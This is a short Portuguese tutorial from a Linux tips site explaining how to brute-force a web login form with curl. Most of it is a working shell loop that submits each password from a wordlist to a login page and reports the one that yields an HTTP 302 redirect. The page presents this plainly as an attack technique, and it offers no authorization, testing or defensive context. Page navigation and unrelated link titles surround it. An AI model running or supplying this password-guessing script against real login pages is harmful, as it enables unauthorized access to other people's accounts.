cURL - Brute-force em aplicações Web
Publicado por Perfil removido em 01/05/2013
[ Hits: 17.965 ]
Usage: curl [options...] <url> -F/--form <name=content> Specify HTTP multipart POST data (H) -o/--output <file> Write output to <file> instead of stdout -s/--silent Silent mode. Don't output anything -w/--write-out <format> What to output after completionRessaltei essas funções, pois serão necessárias para o ataque de brute-force.

for i in `cat wordlist.txt`
do
login=$(curl -s -o /dev/null -F login=mmxm -F pass=$i -w "%{http_code}" localhost/login.php)
if [ $login '==' "302" ]
then
echo "Password: $i"
break
else
echo "Trying: $i"
fi
done
Pronto, você já estará fazendo um ataque de brute-force através de uma "word list", usando o terminal.
Linux Mint: Utilizando o MintUpdate
Instalando o Lazarus no OpenSuSE 11.1
Instalando o LimeWire no Conectiva 10
Aplicativos portáteis no Linux
Verificando montagem de unidade para abrir programa
Copiar uma página do MAN para texto simples sem os ^H^_
Alterando as ID tags de seus arquivos de áudio em massa pelo terminal
Excluindo arquivos por data: find + xargs + rm
Telinha simples de loading.... em Shell Script
Nenhum comentário foi encontrado.
A evolução do Linux e as mudanças que se fazem necessárias desde o seu lançamento
Maquina modesta - a vez dos navegadores ferrarem o usuario
Fscrypt: protegendo arquivos do seu usuário sem a lentidão padrão de criptograr o disco
Faça suas próprias atualizações de pacotes/programas no Void Linux e torne-se um Contribuidor
Warsaw não é reconhecido no Google Chrome 147.0.7727.55 [RESOLVIDO] (9)









